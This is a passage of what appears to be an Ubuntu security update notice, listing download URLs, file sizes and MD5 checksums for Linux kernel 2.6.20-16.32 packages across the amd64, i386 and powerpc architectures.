http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   140012 848ec2c29a62a88e6c2b07d3b4a20d11
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   277482 86a3e8c6c1c3f262f6cc28cbfa15ea56
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:  1905402 21e71ab6b1fd523eb0be4f2290aab63c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.32_amd64.deb
  Size/MD5:   858156 803a187c28bb8f0b0e87872596894a8e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb
  Size/MD5:   857582 cbea9bf84d33e965b202698b05fd35a9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.32_amd64.deb
  Size/MD5:   858634 279d7a23a1bea89f671844c1a9338dc3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_amd64.deb
  Size/MD5:  8128562 3cf69848ebf0efd00057fcb628cc72cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.32_amd64.deb
  Size/MD5: 23066252 d7aa6e43692796eeee8e6cee541d776d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.32_amd64.deb
  Size/MD5: 23386118 33278d4604a35062b689ff3d1b89927c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.32_amd64.deb
  Size/MD5: 18427560 e2ce91d927c1b0737b3e79b84291a98a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.32_amd64.deb
  Size/MD5: 18698840 07697da5633e9aeb66600032f3fdef50
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_amd64.deb
  Size/MD5:   668162 5096377aa743b1299c83a69a027a31d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   246422 9238f0a5fc821f1cde73599ffeed8afb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   144474 51dbc7175f5c04d71fd6fa79c8eaa9c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   225008 ee36fa3988d06a4510419ef134ef27a5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:  1110528 985a54edb8e59a6a5d36e2b9b138208f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:  1754792 6ef2cf009aea3522917bbd5250eac7f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   140920 210137898aae8a150ef6ce211f90a1f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   163304 dde7038b80a04c02221f0a15dafaa665
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   265728 afccb6d244a7c26d2ed2bff9520f38de
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    34298 0e74159dd141ee3410b5700c9f0f7214
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    38432 56b4cccf93a57620bde9c698ffd4bb81
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    67680 a1ff1f4b49b1dcc51742e022ad43ec98
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    20962 318f28a79d4cc3879fc915913da1a791
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:     8326 225dd627cf090ced60263d8bd1c157a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    54580 c8eb2608c5ba1d36140fa09b5301cc7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    86014 c1e8d3e3747a03e309dcd5ad2a5442c9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   322570 09da047475c27276a278e2f014d8be2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:  1046844 3cb54d1dcb9ae126ab50f0da417122da
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    43976 ea4b2eba2374c3bb7f59d6b624fb3ca1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    12010 4c633de1d761b119b8b7aeeee0d632fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    61916 dc0c694f628844c4cdb0bbfd58b92634
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:   377816 8c30f011d1a85e548ee4f14d3f4b4bf0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb
  Size/MD5:    66658 1158b7ea9fd8272d28b1493fcb0fd3bc
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb
  Size/MD5: 23126252 3dbec8c2327684063ed3cf0996cf924b
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb
  Size/MD5: 18477824 4db252af56f0ddc6f0a51d039b5ab619

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    20322 d365c3e10f4dfc63c6eabc65bfc2bfee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    22882 825d0dfb3dc1decfe5e772e4b101741a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   210062 703b0167f46257bb7d03e3ac8b2f57b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   212238 3a430d2e16e4efbfcb5cb07057de3427
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    88694 3c772a6afacefa3e2242e1725c7755ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    35620 0a08fcd1eb13e70336432c9fe15dacd9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    37730 f5fc6240e18a5ab52c82446542238542
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    38408 2151d52af0c5fbb1963a1e0dd5259718
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    45648 c5494d90e1044f4177f9861a19ba8ee6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    45798 3b6efbffcc4bbb6a3a85c85c035cb249
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   179464 7ba01975cd4942eeab584d254e315ed0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   179828 1e218336e370b59d65daa3efea59f0ab
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    32104 f8c0cd231b3317e4860c93ab69925d68
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    32422 47ce242a541ba8f849249e5142983f5d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   648630 f04cecba184c2d2ce738c618b4c01bde
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   667440 6fe6412fd426d10ce19d40259af5e96b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   178190 87051c9f16a48f23d46fabd85b08ce73
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   181278 d047391967cb49e328fed780e57bb131
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    72396 aaa00e702843506a6a1232e14cc9723d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    74048 868e57d20d938d1e4295920dad2f2d26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    53574 bff8e81c4cbf823e8ac40f54644e8328
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    54778 d641c63917264624cab13ca6121e3e12
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   129180 7fb84c6ae57ac34db3e8614c236f8ea2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   134868 148faa30df1b06cfcf00b489d357df98
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   275936 aa540d240f1932d7bc31085911bff171
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   274972 97c1518f800ea8ffd8fef3277ddb2be2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1815890 d3b84df947822d17372230252ecdca36
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1886620 c35948bf361eb4f70588fdfb89743a8f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.32_i386.deb
  Size/MD5:   837592 37c22ab4e3da16f84acfe108e91bba1b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.32_i386.deb
  Size/MD5:   846982 128a98cd7b25b6448a822c06733f44ff
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb
  Size/MD5:   839978 359139ad3c28bc9e821d7cb4298092fa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb
  Size/MD5:   850478 028df4a5999f31bbe75166030e109385
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.32_i386.deb
  Size/MD5:   844198 5ed1d000a16184bcc838320c52834c13
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_i386.deb
  Size/MD5:  8118566 0cb9ce07946491c856d8073d852a05c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.32_i386.deb
  Size/MD5: 23747504 8ce233852054ca216613e3f3a3e57953
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.32_i386.deb
  Size/MD5: 23812978 c2124313521e2022d56176f9ce8198c3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb
  Size/MD5: 24375930 40515fc20df8c8bbbe181055eeba2bde
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.32_i386.deb
  Size/MD5: 23867064 acb627f444f36613b31e178c557eb8c7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.32_i386.deb
  Size/MD5: 23587938 1a3899186b5d2871019c0f64ca8fe59d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.32_i386.deb
  Size/MD5: 24166626 e97ecd27cd0d9ae2cb2da7c4bcd6e1cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb
  Size/MD5: 25657964 a39cac61a38de189485d7785a913a7f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.32_i386.deb
  Size/MD5: 24393184 29691b8a38ea72855b071604a6032ad2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_i386.deb
  Size/MD5:   668152 83fbf6c9c8f182c59bc2a7c71386814e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   244602 de260651df7c2173aec60c0c15f34e31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   250128 371613968e9263d3a7634f322865c52d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   132548 fd7416715256a4614409204b46e6a703
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   133082 d36eea857c71b7576708ee17ec660cdb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   213186 543213b501e2aff2a9d7ba6300ddb84c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   220602 59628ce38ad96149822299157c7a8ee5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1110416 1ee57583e74115c9350866c55ade02cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1110528 2dd987e43dd8b95fa011fa4284b3a8ed
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1951366 df5c47c9222ef066bf97e7c89f60f5c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1974714 ff29ac6547e01d926c4b253438136a9b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   149852 802f9dc122ac0cebfc94ca7db42db0f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   142492 03700387d2f82059ce5c630b341be02e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   160732 229129daccdaf81f943f880214bf0db3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   161932 cf99ec9275a2a2156f5197c2fa7b5af6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   252946 65cb9bd7d36fbd3cb7258132661d764b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   255518 a8c85001852c15fe6f3eaee18b56bbf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    32766 ef56dd680bc61a0315023ed09b8aba48
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    33332 58486f96da6a354b93945c13e18afdcb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    38030 d65208a35c4e2c472eb4fefd3bdb9008
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    38304 cbaf30961ee6a6ae8e52507b143417ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    81852 a33e5995ce0e1f20a819ae29ae3a68fa
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    82096 701a0b59664e1534ddfeacd7787db751
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    47688 3b6901e7171cf7f17dad65afa59b2387
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    47718 d9f07f4ffd9e4e03f97903a2198bf312
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:     8262 211358ff43ea8eec720b7460954d3a7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:     8496 a901401a2e56fe5e9ec176a169b151c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    49952 071653c73617ee0d792580ba747542f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    51874 7407c57c679818222a11de597e3b97dd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    78852 6f03fb2d4a771787c0ce05a9dee9a78b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    79490 3b6d974c4b6ccd4abb061dead43228ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   322546 576d6158962ed22020003212b1d69a4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   322574 19f5305bac2241bb943c3a311cfd8949
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1362506 4136e388409afe1fac07a65e4a905e63
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:  1347998 8bb5f119264dd8404139c68728620400
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    42454 dd3928fd69ec2600ce72262609e62bf4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    42226 e9961b87ef9e7836579fb98a8b012036
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    10766 79f43b46f2a5964212615df4278cb671
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    11398 13c023efde5699988a660edf1bc4effe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    55986 818a768f789118a2e230f02814ccee07
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    56894 a95b43adb1d7c38a345d2ae6c0d99758
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:   360272 2165710ca78753041b68faa06e2fd6f1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:   363224 cb58c41c58379d43b0b72e7ab8127463
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb
  Size/MD5:    63168 ffacab575e4656018c9f9893623b858c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb
  Size/MD5:    63822 96a875eae075925fad17dde480adafe7
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb
  Size/MD5: 23844470 3bd0cf01bdc633260ef0d310c00f2ffc
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb
  Size/MD5: 24184730 f4b2abed85345ac1054717b86b587cf5

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   328858 d6f5924f4e46394f3f8b0255d05f537f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   325600 ab19f82d372591331f9964a86c73d841
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    41188 8b66f7291f4a2d261ddd4ba8a93f8567
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    47450 bab266d30c1b8dbcd9dc3ef168df29d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   219678 325f5837771c9638b08dd3eb30bab314
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   239174 50fbf4f2acd9dcff0fc25d1266ac4c3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    43652 0b28da2e498d294896670e9eb12b907f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    39780 300754124c0d20b61f382004d4e058a1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   717792 ffe8ceda1b479995af571081878f3f07
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   776476 e54e5b90d9ca522f68f6a45a716ef5d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   205066 3958102c34ff26f761bc3f45be13ebdc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:   209730 90c93b39b98c6b13723fa7a1fbf6ffa0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    59218 b82dd9ffdd59e5908ce712dacda00ae6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-powerpc64-smp-di_2.6.20-16.32_powerpc.udeb
  Size/MD5:    66858 6067376216b513e3995675baa0b5f82b
